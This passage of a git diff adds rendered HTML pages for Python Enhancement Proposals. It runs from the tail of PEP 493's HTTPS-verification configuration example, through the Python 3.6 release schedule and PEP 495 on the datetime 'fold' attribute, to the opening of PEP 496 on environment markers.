If a redistributor chooses to backport the environment variable based +configuration setting from this PEP to a modified Python version that also +implements the configuration file based PEP 476 backport, then the environment +variable should take precedence over the system-wide configuration setting. +This allows the setting to be changed for a given user or application, +regardless of the installation-wide default behaviour.

+
+

Example implementation

+
_https_verify_envvar = 'PYTHONHTTPSVERIFY'
+_cert_verification_config = '/etc/python/cert-verification.cfg'
+
+def _get_https_context_factory():
+    # Check for an environmental override of the default behaviour
+    if not sys.flags.ignore_environment:
+        config_setting = os.environ.get(_https_verify_envvar)
+        if config_setting is not None:
+            if config_setting == '0':
+                return _create_unverified_context
+            return create_default_context
+
+    # Check for a system-wide override of the default behaviour
+    context_factories = {
+        'enable': create_default_context,
+        'disable': _create_unverified_context,
+        'platform_default': _create_unverified_context, # For now :)
+    }
+    import ConfigParser
+    config = ConfigParser.RawConfigParser()
+    config.read(_cert_verification_config)
+    try:
+        verify_mode = config.get('https', 'verify')
+    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
+        verify_mode = 'platform_default'
+    default_factory = context_factories.get('platform_default')
+    return context_factories.get(verify_mode, default_factory)
+
+_create_default_https_context = _get_https_context_factory()
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0493.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0494/index.html b/pep-0494/index.html new file mode 100644 index 00000000000..13430b1011c --- /dev/null +++ b/pep-0494/index.html @@ -0,0 +1,353 @@ + + + + + + + + PEP 494 – Python 3.6 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 494 – Python 3.6 Release Schedule

+
+
Author:
+
Ned Deily <nad at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
30-May-2015
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.6. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.6 Release Manager: Ned Deily
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard, Georg Brandl
  • +
+
+
+

3.6 Lifespan

+

3.6 will receive bugfix updates +approximately every 3 months for about 24 months. Sometime after the release of +3.7.0 final, a final 3.6 bugfix update will be released. +After that, it is expected that +security updates +(source only) will be released as needed until 5 years after +the release of 3.6 final, so until approximately 2021-12.

+

As of 2021-12-23, 3.6 has reached the +end-of-life phase +of its release cycle. 3.6.15 was the final security release. The code base for +3.6 is now frozen and no further updates will be provided nor issues of any +kind will be accepted on the bug tracker.

+
+
+

Release Schedule

+
+

3.6.0 schedule

+
    +
  • 3.6 development begins: 2015-05-24
  • +
  • 3.6.0 alpha 1: 2016-05-17
  • +
  • 3.6.0 alpha 2: 2016-06-13
  • +
  • 3.6.0 alpha 3: 2016-07-11
  • +
  • 3.6.0 alpha 4: 2016-08-15
  • +
  • 3.6.0 beta 1: 2016-09-12 +(No new features beyond this point.)
  • +
  • 3.6.0 beta 2: 2016-10-10
  • +
  • 3.6.0 beta 3: 2016-10-31
  • +
  • 3.6.0 beta 4: 2016-11-21
  • +
  • 3.6.0 candidate 1: 2016-12-06
  • +
  • 3.6.0 candidate 2: 2016-12-16
  • +
  • 3.6.0 final: 2016-12-23
  • +
+
+
+

3.6.1 schedule (first bugfix release)

+
    +
  • 3.6.1 candidate: 2017-03-05
  • +
  • 3.6.1 final: 2017-03-21
  • +
+
+
+

3.6.2 schedule

+
    +
  • 3.6.2 candidate 1: 2017-06-17
  • +
  • 3.6.2 candidate 2: 2017-07-07
  • +
  • 3.6.2 final: 2017-07-17
  • +
+
+
+

3.6.3 schedule

+
    +
  • 3.6.3 candidate: 2017-09-19
  • +
  • 3.6.3 final: 2017-10-03
  • +
+
+
+

3.6.4 schedule

+
    +
  • 3.6.4 candidate: 2017-12-05
  • +
  • 3.6.4 final: 2017-12-19
  • +
+
+
+

3.6.5 schedule

+
    +
  • 3.6.5 candidate: 2018-03-13
  • +
  • 3.6.5 final: 2018-03-28
  • +
+
+
+

3.6.6 schedule

+
    +
  • 3.6.6 candidate: 2018-06-12
  • +
  • 3.6.6 final: 2018-06-27
  • +
+
+
+

3.6.7 schedule

+
    +
  • 3.6.7 candidate: 2018-09-26
  • +
  • 3.6.7 candidate 2: 2018-10-13
  • +
  • 3.6.7 final: 2018-10-20
  • +
+
+
+

3.6.8 schedule (last bugfix release)

+

Last binary releases

+
    +
  • 3.6.8 candidate: 2018-12-11
  • +
  • 3.6.8 final: 2018-12-24
  • +
+
+
+

3.6.9 schedule (first security-only release)

+

Source only

+
    +
  • 3.6.9 candidate 1: 2019-06-18
  • +
  • 3.6.9 final: 2019-07-02
  • +
+
+
+

3.6.10 schedule

+
    +
  • 3.6.10 candidate 1: 2019-12-11
  • +
  • 3.6.10 final: 2019-12-18
  • +
+
+
+

3.6.11 schedule

+
    +
  • 3.6.11 candidate 1: 2020-06-15
  • +
  • 3.6.11 final: 2020-06-27
  • +
+
+
+

3.6.12 schedule

+
    +
  • 3.6.12 final: 2020-08-17
  • +
+
+
+

3.6.13 schedule

+
    +
  • 3.6.13 final: 2021-02-15
  • +
+
+
+

3.6.14 schedule

+
    +
  • 3.6.14 final: 2021-06-28
  • +
+
+
+

3.6.15 schedule (last security-only release)

+
    +
  • 3.6.15 final: 2021-09-04
  • +
+
+
+
+

Features for 3.6

+

Implemented changes for 3.6 (as of 3.6.0 beta 1):

+
    +
  • PEP 468, Preserving Keyword Argument Order
  • +
  • PEP 487, Simpler customization of class creation
  • +
  • PEP 495, Local Time Disambiguation
  • +
  • PEP 498, Literal String Formatting
  • +
  • PEP 506, Adding A Secrets Module To The Standard Library
  • +
  • PEP 509, Add a private version to dict
  • +
  • PEP 515, Underscores in Numeric Literals
  • +
  • PEP 519, Adding a file system path protocol
  • +
  • PEP 520, Preserving Class Attribute Definition Order
  • +
  • PEP 523, Adding a frame evaluation API to CPython
  • +
  • PEP 524, Make os.urandom() blocking on Linux (during system startup)
  • +
  • PEP 525, Asynchronous Generators (provisional)
  • +
  • PEP 526, Syntax for Variable Annotations (provisional)
  • +
  • PEP 528, Change Windows console encoding to UTF-8 (provisional)
  • +
  • PEP 529, Change Windows filesystem encoding to UTF-8 (provisional)
  • +
  • PEP 530, Asynchronous Comprehensions
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0494.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0495/index.html b/pep-0495/index.html new file mode 100644 index 00000000000..d220e84a75d --- /dev/null +++ b/pep-0495/index.html @@ -0,0 +1,1009 @@ + + + + + + + + PEP 495 – Local Time Disambiguation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 495 – Local Time Disambiguation

+
+
Author:
+
Alexander Belopolsky <alexander.belopolsky at gmail.com>, Tim Peters <tim.peters at gmail.com>
+
Discussions-To:
+
Datetime-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Aug-2015
+
Python-Version:
+
3.6
+
Resolution:
+
Datetime-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new attribute fold to instances of the +datetime.time and datetime.datetime classes that can be used +to differentiate between two moments in time for which local times are +the same. The allowed values for the fold attribute will be 0 and 1 +with 0 corresponding to the earlier and 1 to the later of the two +possible readings of an ambiguous local time.

+
+
+

Rationale

+

In most world locations, there have been and will be times when +local clocks are moved back. [1] In those times, intervals are +introduced in which local clocks show the same time twice in the same +day. In these situations, the information displayed on a local clock +(or stored in a Python datetime instance) is insufficient to identify +a particular moment in time. The proposed solution is to add an +attribute to the datetime instances taking values of 0 and 1 that +will enumerate the two ambiguous times.

+A cartoon of a strong man struggling to stop the hands of a large clock. The caption reads: You can't stop time... but you can turn it back one hour at 2 a.m. Oct. 28 when daylight-saving time ends and standard time begins." + + +
+
+

Terminology

+

When clocks are moved back, we say that a fold [2] is created in time. +When the clocks are moved forward, a gap is created. A local time +that falls in the fold is called ambiguous. A local time that falls +in the gap is called missing.

+ +
+
+

Proposal

+
+

The “fold” attribute

+

We propose adding an attribute called fold to instances of the +datetime.time and datetime.datetime classes. This attribute +should have the value 0 for all instances except those that represent +the second (chronologically) moment in time in an ambiguous case. For +those instances, the value will be 1. [3]

+ +
+
+

Affected APIs

+
+

Attributes

+

Instances of datetime.time and datetime.datetime classes will +get a new attribute fold with two possible values: 0 and 1.

+
+
+

Constructors

+

The __new__ methods of the datetime.time and +datetime.datetime classes will get a new keyword-only argument +called fold with the default value 0. The value of the +fold argument will be used to initialize the value of the +fold attribute in the returned instance.

+
+
+

Methods

+

The replace() methods of the datetime.time and +datetime.datetime classes will get a new keyword-only argument +called fold. It will behave similarly to the other replace() +arguments: if the fold argument is specified and given a value 0 +or 1, the new instance returned by replace() will have its +fold attribute set to that value. In CPython, any non-integer +value of fold will raise a TypeError, but other +implementations may allow the value None to behave the same as +when fold is not given. [4] (This is +a nod to the existing difference in treatment of None arguments +in other positions of this method across Python implementations; +it is not intended to leave the door open for future alternative +interpretation of fold=None.) If the fold argument is not +specified, the original value of the fold attribute is copied to +the result.

+ +
+
+

C-API

+

Access macros will be defined to extract the value of fold from +PyDateTime_DateTime and PyDateTime_Time objects.

+
int PyDateTime_DATE_GET_FOLD(PyDateTime_DateTime *o)
+
+
+

Return the value of fold as a C int.

+
int PyDateTime_TIME_GET_FOLD(PyDateTime_Time *o)
+
+
+

Return the value of fold as a C int.

+

New constructors will be defined that will take an additional +argument to specify the value of fold in the created +instance:

+
PyObject* PyDateTime_FromDateAndTimeAndFold(
+    int year, int month, int day, int hour, int minute,
+    int second, int usecond, int fold)
+
+
+

Return a datetime.datetime object with the specified year, month, +day, hour, minute, second, microsecond and fold.

+
PyObject* PyTime_FromTimeAndFold(
+    int hour, int minute, int second, int usecond, int fold)
+
+
+

Return a datetime.time object with the specified hour, minute, +second, microsecond and fold.

+
+
+
+

Affected Behaviors

+
+

What time is it?

+

The datetime.now() method called without arguments will set +fold=1 when returning the second of the two ambiguous times in a +system local time fold. When called with a tzinfo argument, the +value of the fold will be determined by the tzinfo.fromutc() +implementation. When an instance of the datetime.timezone class +(the stdlib’s fixed-offset tzinfo subclass, +e.g. datetime.timezone.utc) is passed as tzinfo, the +returned datetime instance will always have fold=0. +The datetime.utcnow() method is unaffected.

+
+
+

Conversion from naive to aware

+

A new feature is proposed to facilitate conversion from naive datetime +instances to aware.

+

The astimezone() method will now work for naive self. The +system local timezone will be assumed in this case and the fold +flag will be used to determine which local timezone is in effect +in the ambiguous case.

+

For example, on a system set to US/Eastern timezone:

+
>>> dt = datetime(2014, 11, 2, 1, 30)
+>>> dt.astimezone().strftime('%D %T %Z%z')
+'11/02/14 01:30:00 EDT-0400'
+>>> dt.replace(fold=1).astimezone().strftime('%D %T %Z%z')
+'11/02/14 01:30:00 EST-0500'
+
+
+

An implication is that datetime.now(tz) is fully equivalent to +datetime.now().astimezone(tz) (assuming tz is an instance of a +post-PEP tzinfo implementation, i.e. one that correctly handles +and sets fold).

+
+
+

Conversion from POSIX seconds from EPOCH

+

The fromtimestamp() static method of datetime.datetime will +set the fold attribute appropriately in the returned object.

+

For example, on a system set to US/Eastern timezone:

+
>>> datetime.fromtimestamp(1414906200)
+datetime.datetime(2014, 11, 2, 1, 30)
+>>> datetime.fromtimestamp(1414906200 + 3600)
+datetime.datetime(2014, 11, 2, 1, 30, fold=1)
+
+
+
+
+

Conversion to POSIX seconds from EPOCH

+

The timestamp() method of datetime.datetime will return different +values for datetime.datetime instances that differ only by the value +of their fold attribute if and only if these instances represent an +ambiguous or a missing time.

+

When a datetime.datetime instance dt represents an ambiguous +time, there are two values s0 and s1 such that:

+
datetime.fromtimestamp(s0) == datetime.fromtimestamp(s1) == dt
+
+
+

(This is because == disregards the value of fold – see below.)

+

In this case, dt.timestamp() will return the smaller of s0 +and s1 values if dt.fold == 0 and the larger otherwise.

+

For example, on a system set to US/Eastern timezone:

+
>>> datetime(2014, 11, 2, 1, 30, fold=0).timestamp()
+1414906200.0
+>>> datetime(2014, 11, 2, 1, 30, fold=1).timestamp()
+1414909800.0
+
+
+

When a datetime.datetime instance dt represents a missing +time, there is no value s for which:

+
datetime.fromtimestamp(s) == dt
+
+
+

but we can form two “nice to know” values of s that differ +by the size of the gap in seconds. One is the value of s +that would correspond to dt in a timezone where the UTC offset +is always the same as the offset right before the gap and the +other is the similar value but in a timezone the UTC offset +is always the same as the offset right after the gap.

+

The value returned by dt.timestamp() given a missing +dt will be the greater of the two “nice to know” values +if dt.fold == 0 and the smaller otherwise. +(This is not a typo – it’s intentionally backwards from the rule for +ambiguous times.)

+

For example, on a system set to US/Eastern timezone:

+
>>> datetime(2015, 3, 8, 2, 30, fold=0).timestamp()
+1425799800.0
+>>> datetime(2015, 3, 8, 2, 30, fold=1).timestamp()
+1425796200.0
+
+
+
+
+

Aware datetime instances

+

Users of pre-PEP implementations of tzinfo will not see any +changes in the behavior of their aware datetime instances. Two such +instances that differ only by the value of the fold attribute will +not be distinguishable by any means other than an explicit access to +the fold value. (This is because these pre-PEP implementations +are not using the fold attribute.)

+

On the other hand, if an object’s tzinfo is set to a fold-aware +implementation, then in a fold or gap the value of fold will +affect the result of several methods: +utcoffset(), dst(), tzname(), astimezone(), +strftime() (if the “%Z” or “%z” directive is used in the format +specification), isoformat(), and timetuple().

+
+
+

Combining and splitting date and time

+

The datetime.datetime.combine() method will copy the value of the +fold attribute to the resulting datetime.datetime instance.

+

The datetime.datetime.time() method will copy the value of the +fold attribute to the resulting datetime.time instance.

+
+
+

Pickles

+

The value of the fold attribute will only be saved in pickles created +with protocol version 4 (introduced in Python 3.4) or greater.

+

Pickle sizes for the datetime.datetime and datetime.time +objects will not change. The fold value will be encoded in the +first bit of the 3rd byte of the datetime.datetime +pickle payload; and in the first bit of the 1st byte of the +datetime.time payload. In the current implementation +these bytes are used to store the month (1-12) and hour (0-23) values +and the first bit is always 0. We picked these bytes because they are +the only bytes that are checked by the current unpickle code. Thus +loading post-PEP fold=1 pickles in a pre-PEP Python will result in +an exception rather than an instance with out of range components.

+
+
+
+
+

Implementations of tzinfo in the Standard Library

+

No new implementations of datetime.tzinfo abstract class are +proposed in this PEP. The existing (fixed offset) timezones do +not introduce ambiguous local times and their utcoffset() +implementation will return the same constant value as they do now +regardless of the value of fold.

+

The basic implementation of fromutc() in the abstract +datetime.tzinfo class will not change. It is currently not used +anywhere in the stdlib because the only included tzinfo +implementation (the datetime.timezone class implementing fixed +offset timezones) overrides fromutc(). Keeping the default +implementation unchanged has the benefit that pre-PEP 3rd party +implementations that inherit the default fromutc() are not +accidentally affected.

+
+
+

Guidelines for New tzinfo Implementations

+

Implementors of concrete datetime.tzinfo subclasses who want to +support variable UTC offsets (due to DST and other causes) should follow +these guidelines.

+
+

Ignorance is Bliss

+

New implementations of utcoffset(), tzname() and dst() +methods should ignore the value of fold unless they are called on +the ambiguous or missing times.

+
+
+

In the Fold

+

New subclasses should override the base-class fromutc() method and +implement it so that in all cases where two different UTC times u0 and +u1 (u0 <u1) correspond to the same local time t, +fromutc(u0) will return an instance with fold=0 and +fromutc(u1) will return an instance with fold=1. In all +other cases the returned instance should have fold=0.

+

The utcoffset(), tzname() and dst() methods should use the +value of the fold attribute to determine whether an otherwise +ambiguous time t corresponds to the time before or after the +transition. By definition, utcoffset() is greater before and +smaller after any transition that creates a fold. The values returned +by tzname() and dst() may or may not depend on the value of +the fold attribute depending on the kind of the transition.

+Diagram of relationship between UTC and local time around a fall-back transition – see full description on page. + +

The sketch above illustrates the relationship between the UTC and +local time around a fall-back transition. The zig-zag line is a graph +of the function implemented by fromutc(). Two intervals on the +UTC axis adjacent to the transition point and having the size of the +time shift at the transition are mapped to the same interval on the +local axis. New implementations of fromutc() method should set +the fold attribute to 1 when self is in the region marked in +yellow on the UTC axis. (All intervals should be treated as closed on +the left and open on the right.)

+
+
+

Mind the Gap

+

The fromutc() method should never produce a time in the gap.

+

If the utcoffset(), tzname() or dst() method is called on a +local time that falls in a gap, the rules in effect before the +transition should be used if fold=0. Otherwise, the rules in +effect after the transition should be used.

+Diagram of relationship between UTC and local time around a spring-forward transition – see full description on page. + +

The sketch above illustrates the relationship between the UTC and +local time around a spring-forward transition. At the transition, the +local clock is advanced skipping the times in the gap. For the +purposes of determining the values of utcoffset(), tzname() +and dst(), the line before the transition is extended forward to +find the UTC time corresponding to the time in the gap with fold=0 +and for instances with fold=1, the line after the transition is +extended back.

+
+
+

Summary of Rules at a Transition

+

On ambiguous/missing times utcoffset() should return values +according to the following table:

+ + + + + + + + + + + + + + + + + +
fold=0fold=1
Foldoldoffnewoff = oldoff - delta
Gapoldoffnewoff = oldoff + delta
+

where oldoff (newoff) is the UTC offset before (after) the +transition and delta is the absolute size of the fold or the gap.

+

Note that the interpretation of the fold attribute is consistent in +the fold and gap cases. In both cases, fold=0 (fold=1) means +use fromutc() line before (after) the transition to find the UTC +time. Only in the “Fold” case, the UTC times u0 and u1 are +“real” solutions for the equation fromutc(u) == t, while in the +“Gap” case they are “imaginary” solutions.

+
+
+

The DST Transitions

+

On a missing time introduced at the start of DST, the values returned +by utcoffset() and dst() methods should be as follows

+ + + + + + + + + + + + + + + + + +
fold=0fold=1
utcoffset()stdoffstdoff + dstoff
dst()zerodstoff
+

On an ambiguous time introduced at the end of DST, the values returned +by utcoffset() and dst() methods should be as follows

+ + + + + + + + + + + + + + + + + +
fold=0fold=1
utcoffset()stdoff + dstoffstdoff
dst()dstoffzero
+

where stdoff is the standard (non-DST) offset, dstoff is the +DST correction (typically dstoff = timedelta(hours=1)) and zero += timedelta(0).

+
+
+
+

Temporal Arithmetic and Comparison Operators

+
+
+
In mathematicks he was greater
+
Than Tycho Brahe, or Erra Pater:
+
For he, by geometric scale,
+
Could take the size of pots of ale;
+
Resolve, by sines and tangents straight,
+
If bread or butter wanted weight,
+
And wisely tell what hour o’ th’ day
+
The clock does strike by algebra.
+
+
+
– “Hudibras” by Samuel Butler
+
+

The value of the fold attribute will be ignored in all operations +with naive datetime instances. As a consequence, naive +datetime.datetime or datetime.time instances that differ only +by the value of fold will compare as equal. Applications that +need to differentiate between such instances should check the value of +fold explicitly or convert those instances to a timezone that does +not have ambiguous times (such as UTC).

+

The value of fold will also be ignored whenever a timedelta is +added to or subtracted from a datetime instance which may be either +aware or naive. The result of addition (subtraction) of a timedelta +to (from) a datetime will always have fold set to 0 even if the +original datetime instance had fold=1.

+

No changes are proposed to the way the difference t - s is +computed for datetime instances t and s. If both instances +are naive or t.tzinfo is the same instance as s.tzinfo +(t.tzinfo is s.tzinfo evaluates to True) then t - s is a +timedelta d such that s + d == t. As explained in the +previous paragraph, timedelta addition ignores both fold and +tzinfo attributes and so does intra-zone or naive datetime +subtraction.

+

Naive and intra-zone comparisons will ignore the value of fold and +return the same results as they do now. (This is the only way to +preserve backward compatibility. If you need an aware intra-zone +comparison that uses the fold, convert both sides to UTC first.)

+

The inter-zone subtraction will be defined as it is now: t - s is +computed as (t - t.utcoffset()) - (s - +s.utcoffset()).replace(tzinfo=t.tzinfo), but the result will +depend on the values of t.fold and s.fold when either +t.tzinfo or s.tzinfo is post-PEP. [5]

+ +
+

Aware datetime Equality Comparison

+

The aware datetime comparison operators will work the same as they do +now, with results indirectly affected by the value of fold whenever +the utcoffset() value of one of the operands depends on it, with one +exception. Whenever one or both of the operands in inter-zone comparison is +such that its utcoffset() depends on the value of its fold +fold attribute, the result is False. [6]

+ +

Formally, t == s when t.tzinfo is s.tzinfo evaluates to +False can be defined as follows. Let toutc(t, fold) be a +function that takes an aware datetime instance t and returns a +naive instance representing the same time in UTC assuming a given +value of fold:

+
def toutc(t, fold):
+    u = t - t.replace(fold=fold).utcoffset()
+    return u.replace(tzinfo=None)
+
+
+

Then t == s is equivalent to

+
toutc(t, fold=0) == toutc(t, fold=1) == toutc(s, fold=0) == toutc(s, fold=1)
+
+
+
+
+
+

Backward and Forward Compatibility

+

This proposal will have little effect on the programs that do not read +the fold flag explicitly or use tzinfo implementations that do. +The only visible change for such programs will be that conversions to +and from POSIX timestamps will now round-trip correctly (up to +floating point rounding). Programs that implemented a work-around to +the old incorrect behavior may need to be modified.

+

Pickles produced by older programs will remain fully forward +compatible. Only datetime/time instances with fold=1 pickled +in the new versions will become unreadable by the older Python +versions. Pickles of instances with fold=0 (which is the +default) will remain unchanged.

+
+
+

Questions and Answers

+
+

Why not call the new flag “isdst”?

+
+

A non-technical answer

+
    +
  • Alice: Bob - let’s have a stargazing party at 01:30 AM tomorrow!
  • +
  • Bob: Should I presume initially that Daylight Saving Time is or is +not in effect for the specified time?
  • +
  • Alice: Huh?
  • +
+
+
    +
  • Bob: Alice - let’s have a stargazing party at 01:30 AM tomorrow!
  • +
  • Alice: You know, Bob, 01:30 AM will happen twice tomorrow. Which time do you have in mind?
  • +
  • Bob: I did not think about it, but let’s pick the first.
  • +
+
+

(same characters, an hour later)

+
+
    +
  • Bob: Alice - this Py-O-Clock gadget of mine asks me to choose +between fold=0 and fold=1 when I set it for tomorrow 01:30 AM. +What should I do?
  • +
  • Alice: I’ve never hear of a Py-O-Clock, but I guess fold=0 is +the first 01:30 AM and fold=1 is the second.
  • +
+
+
+

A technical reason

+

While the tm_isdst field of the time.struct_time object can be +used to disambiguate local times in the fold, the semantics of such +disambiguation are completely different from the proposal in this PEP.

+

The main problem with the tm_isdst field is that it is impossible +to know what value is appropriate for tm_isdst without knowing the +details about the time zone that are only available to the tzinfo +implementation. Thus while tm_isdst is useful in the output of +methods such as time.localtime, it is cumbersome as an input of +methods such as time.mktime.

+

If the programmer misspecified a non-negative value of tm_isdst to +time.mktime, the result will be time that is 1 hour off and since +there is rarely a way to know anything about DST before a call to +time.mktime is made, the only sane choice is usually +tm_isdst=-1.

+

Unlike tm_isdst, the proposed fold attribute has no effect on +the interpretation of the datetime instance unless without that +attribute two (or no) interpretations are possible.

+

Since it would be very confusing to have something called isdst +that does not have the same semantics as tm_isdst, we need a +different name. Moreover, the datetime.datetime class already has +a method called dst() and if we called fold “isdst”, we would +necessarily have situations when “isdst” is zero but dst() is not +or the other way around.

+
+
+
+

Why “fold”?

+

Suggested by Guido van Rossum and favored by one (but initially +disfavored by another) author. A consensus was reached after the +allowed values for the attribute were changed from False/True to 0/1. +The noun “fold” has correct connotations and easy mnemonic rules, but +at the same time does not invite unbased assumptions.

+
+
+

What is “first”?

+

This was a working name of the attribute chosen initially because the +obvious alternative (“second”) conflicts with the existing attribute. +It was rejected mostly on the grounds that it would make True a +default value.

+

The following alternative names have also been considered:

+
+
later
A close contender to “fold”. One author dislikes it because +it is confusable with equally fitting “latter,” but in the age +of auto-completion everywhere this is a small consideration. A +stronger objection may be that in the case of missing time, we +will have later=True instance converted to an earlier time by +.astimezone(timezone.utc) that that with later=False. +Yet again, this can be interpreted as a desirable indication that +the original time is invalid.
+
which
The original placeholder name for the localtime function +branch index was independently proposed for the name of the +disambiguation attribute and received some support.
+
repeated
Did not receive any support on the mailing list.
+
ltdf
(Local Time Disambiguation Flag) - short and no-one will attempt +to guess what it means without reading the docs. (This abbreviation +was used in PEP discussions with the meaning ltdf=False is the +earlier by those who didn’t want to endorse any of the alternatives.)
+
+
+
+

Are two values enough?

+

Several reasons have been raised to allow a None or -1 value for +the fold attribute: backward compatibility, analogy with tm_isdst +and strict checking for invalid times.

+
+

Backward Compatibility

+

It has been suggested that backward compatibility can be improved if +the default value of the fold flag was None which would +signal that pre-PEP behavior is requested. Based on the analysis +below, we believe that the proposed changes with the fold=0 +default are sufficiently backward compatible.

+

This PEP provides only three ways for a program to discover that two +otherwise identical datetime instances have different values of +fold: (1) an explicit check of the fold attribute; (2) if +the instances are naive - conversion to another timezone using the +astimezone() method; and (3) conversion to float using the +timestamp() method.

+

Since fold is a new attribute, the first option is not available +to the existing programs. Note that option (2) only works for naive +datetimes that happen to be in a fold or a gap in the system time +zone. In all other cases, the value of fold will be ignored in +the conversion unless the instances use a fold-aware tzinfo +which would not be available in a pre-PEP program. Similarly, the +astimezone() called on a naive instance will not be available in +such program because astimezone() does not currently work with +naive datetimes.

+

This leaves us with only one situation where an existing program can +start producing different results after the implementation of this PEP: +when a datetime.timestamp() method is called on a naive datetime +instance that happen to be in the fold or the gap. In the current +implementation, the result is undefined. Depending on the system +mktime implementation, the programs can see different results or +errors in those cases. With this PEP in place, the value of timestamp +will be well-defined in those cases but will depend on the value of +the fold flag. We consider the change in +datetime.timestamp() method behavior a bug fix enabled by this +PEP. The old behavior can still be emulated by the users who depend +on it by writing time.mktime(dt.timetuple()) + 1e-6*dt.microsecond +instead of dt.timestamp().

+
+
+

Analogy with tm_isdst

+

The time.mktime interface allows three values for the tm_isdst +flag: -1, 0, and 1. As we explained above, -1 (asking mktime to +determine whether DST is in effect for the given time from the rest of +the fields) is the only choice that is useful in practice.

+

With the fold flag, however, datetime.timestamp() will return +the same value as mktime with tm_isdst=-1 in 99.98% of the +time for most time zones with DST transitions. Moreover, +tm_isdst=-1-like behavior is specified regardless of the value +of fold.

+

It is only in the 0.02% cases (2 hours per year) that the +datetime.timestamp() and mktime with tm_isdst=-1 may +disagree. However, even in this case, most of the mktime +implementations will return the fold=0 or the fold=1 +value even though relevant standards allow mktime to return -1 and +set an error code in those cases.

+

In other words, tm_isdst=-1 behavior is not missing from this PEP. +To the contrary, it is the only behavior provided in two different +well-defined flavors. The behavior that is missing is when a given +local hour is interpreted as a different local hour because of the +misspecified tm_isdst.

+

For example, in the DST-observing time zones in the Northern +hemisphere (where DST is in effect in June) one can get

+
>>> from time import mktime, localtime
+>>> t = mktime((2015, 6, 1, 12, 0, 0, -1, -1, 0))
+>>> localtime(t)[:]
+(2015, 6, 1, 13, 0, 0, 0, 152, 1)
+
+
+

Note that 12:00 was interpreted as 13:00 by mktime. With the +datetime.timestamp, datetime.fromtimestamp, it is currently +guaranteed that

+
>>> t = datetime.datetime(2015, 6, 1, 12).timestamp()
+>>> datetime.datetime.fromtimestamp(t)
+datetime.datetime(2015, 6, 1, 12, 0)
+
+
+

This PEP extends the same guarantee to both values of fold:

+
>>> t = datetime.datetime(2015, 6, 1, 12, fold=0).timestamp()
+>>> datetime.datetime.fromtimestamp(t)
+datetime.datetime(2015, 6, 1, 12, 0)
+
+
+
>>> t = datetime.datetime(2015, 6, 1, 12, fold=1).timestamp()
+>>> datetime.datetime.fromtimestamp(t)
+datetime.datetime(2015, 6, 1, 12, 0)
+
+
+

Thus one of the suggested uses for fold=-1 – to match the legacy +behavior – is not needed. Either choice of fold will match the +old behavior except in the few cases where the old behavior was +undefined.

+
+
+

Strict Invalid Time Checking

+

Another suggestion was to use fold=-1 or fold=None to +indicate that the program truly has no means to deal with the folds +and gaps and dt.utcoffset() should raise an error whenever dt +represents an ambiguous or missing local time.

+

The main problem with this proposal, is that dt.utcoffset() is +used internally in situations where raising an error is not an option: +for example, in dictionary lookups or list/set membership checks. So +strict gap/fold checking behavior would need to be controlled by a +separate flag, say dt.utcoffset(raise_on_gap=True, +raise_on_fold=False). However, this functionality can be easily +implemented in user code:

+
def utcoffset(dt, raise_on_gap=True, raise_on_fold=False):
+    u = dt.utcoffset()
+    v = dt.replace(fold=not dt.fold).utcoffset()
+    if u == v:
+        return u
+    if (u < v) == dt.fold:
+        if raise_on_fold:
+            raise AmbiguousTimeError
+    else:
+        if raise_on_gap:
+            raise MissingTimeError
+    return u
+
+
+

Moreover, raising an error in the problem cases is only one of many +possible solutions. An interactive program can ask the user for +additional input, while a server process may log a warning and take an +appropriate default action. We cannot possibly provide functions for +all possible user requirements, but this PEP provides the means to +implement any desired behavior in a few lines of code.

+
+
+
+
+

Implementation

+ +
+ +
+

Picture Credit

+

This image is a work of a U.S. military or Department of Defense +employee, taken or made as part of that person’s official duties. As a +work of the U.S. federal government, the image is in the public +domain.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0495.rst

+

Last modified: 2024-01-11 16:25:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0496/index.html b/pep-0496/index.html new file mode 100644 index 00000000000..1ca3a94a812 --- /dev/null +++ b/pep-0496/index.html @@ -0,0 +1,268 @@ + + + + + + + + PEP 496 – Environment Markers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 496 – Environment Markers

+
+
Author:
+
James Polley <jp at jamezpolley.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
03-Jul-2015
+
+
+
+
Table of Contents +
+
+

PEP Status

+

After this PEP was initially drafted, PEP 508 was developed and submitted to +fully specify the dependency declaration syntax, including environment markers. +As a result, this PEP ended up being rejected in favour of the more comprehensive +PEP 508.

+
+
+

Abstract

+

An environment marker describes a condition about the current execution +environment. They are used to indicate when certain dependencies are only +required in particular environments, and to indicate supported platforms +for distributions with additional constraints beyond the availability of a +Python runtime.

+

